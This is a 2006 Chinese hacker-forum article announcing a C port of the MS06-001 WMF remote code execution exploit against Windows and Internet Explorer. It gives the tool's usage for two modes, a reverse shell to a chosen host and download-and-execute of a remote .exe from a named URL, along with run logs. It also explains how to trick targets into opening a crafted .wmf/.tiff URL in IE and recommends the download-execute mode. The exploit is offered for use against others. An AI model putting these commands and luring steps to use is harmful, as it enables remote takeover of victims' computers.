ms0601wmf文件远程执行代码利用程序无敌版

通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码

电信 ┊ 网通 ┊ 铁通 ┊ 移动　

在线人

文章搜索：

热门搜索：红客黑鹰红客技术安全动画红客培训

　业内新闻漏洞公告病毒公告电脑知识网络知识菜鸟入门攻防教程黑客攻防安全编程工具使用综合安全个人安全安全相关 Q Q安全原创精华红客人物站内事件

您现在的位置：爱国者安全网 >> 文章类 >> 原创精华 >> 文章正文

ms0601wmf文件远程执行代码利用程序无敌版

责任编辑：古典辣M° 　更新日期：2006-1-13

好久没发原创了，再不发就要被冰血那丫给SM了：－（wmf文件格式的漏洞出了这么久了，最近才有时间研究一下。。。想必这个漏洞也吸引了很多人的眼球吧。。。metasploit果然牛啊，推出的exploit总是那么及时而又有效。。。。闲着没事，就改成C版的了，程序运行帮助如下：

QUOTE:

Microsoft Windows / Internet Explorer WMF Remote Code Execution Exploit

P.O.C VERSION

codez by superlone@EST

Usage:
wmfexp

shell type <====> 1:
<====>

e.g: wmfexp 1 192.168.1.111 8080 192.168.1.111 1314

shell type <====> 2:
<====>

e.g: wmfexp 2 192.168.1.111 8080 http://www.eviloctal.com/superlone.exe

^_^ SHOW my love to LiuHui,for EVER and EVER!!!!

一看就明白的，不用我多说了吧？反向溢出的实例如下：

QUOTE:

E:\temp\Release>wmfexp 1 192.168.1.111 8080 192.168.1.111 1314
Microsoft Windows / Internet Explorer WMF Remote Code Execution Exploit

P.O.C VERSION
written by superlone@EST

^_^MY love goes to my wife for EVER and EVER

^_^binding 192.168.1.111 on port 8080 with socket ...DONE!
^_^waiting for connection of ANY.WMF request ...GOT IT!
^_^connection received from 192.168.1.3 on port 42249
^_^generating payload ...DONE!
^_^sending crafted data to the remote host 192.168.1.3 ...DONE!
^_^do i work well?-)

结果看附图。

下载执行的实例如下：

QUOTE:

E:\temp\Release>wmfexp 2 192.168.1.111 8080 http://www.huibian.com/wmf/wmf.exe
Microsoft Windows / Internet Explorer WMF Remote Code Execution Exploit

P.O.C VERSION
written by superlone@EST

^_^MY love goes to my wife for EVER and EVER

^_^binding 192.168.1.111 on port 8080 with socket ...DONE!
^_^waiting for connection of ANY.WMF request ...GOT IT!
^_^connection received from 192.168.1.3 on port 43529
^_^generating payload ...DONE!
^_^sending crafted data to the remote host 192.168.1.3 ...DONE!
^_^do i work well?-)

结果如附图。。。

由于是POC版所以我没有优化shellcode，等过些时日公布出代码后大家可以自行更改！！！

PS：
我在sp2上也是测试成功的，不知道你们知道测试方法不？8080端口是本地绑定的端口，伪装成http server的，如果这个端口已经有程序占用程序就会出现“...*_* error:bind operation fail
ed”，没使用端口复用。。。
另外这个漏洞程序的利用是不是还有很多朋友不明白啊，当程序出现“^_^waiting for connection of ANY.WMF request ...”时，说明exploit已经成功运行并已经监听在你设置的端口上了（比如8080），这个时候需要你发挥你的想像力想办法让对方在IE中访问你的URL，不知道你的url吗？怪我忘了跟大家说了，如果对方访问这样的url：
http://你的IP：你监听的端口/any.wmf

就会中招，其中你的IP不用说了吧？外网使用的话肯定要有公网IP的。。。。你监听的端口就是伪装的http server的端口，在例子中是8080端口。any.wmf是任意的文件，随便你写吧，但后缀必须是以下中的一个：
dib emf wmf bmp tiff
比如这样的url：
http://192.168.1.111:8080/mylove.tiff
只要有漏洞的主机用IE打开上面的这个URL就会中标了。。。。另外，我上面测试有个windows按钮专家的截图，那个就是在xp sp1的机器上访问我的url后成功下载执行的。。。

明白了吗？我的程序提供了反向连接和下载执行两个功能，推荐你使用下载执行。。。为什么？你丫找抽～～～
再要说明，发布的这个程序是P.O.C版本，因此没有对http请求包进行分析，比如判断目标机器是不是xp以上的系统等等。。。需要源代码的可以找我要，或者过几天就公布了。。。
还不明白的我就没办法了，虎子说我的语言表达能力很强的。。。。

注意：测试url后使用的后缀名只可以是以下几个中的一个：
dib emf wmf bmp tiff

上一篇文章：推荐:动网7.x权限提升漏洞原理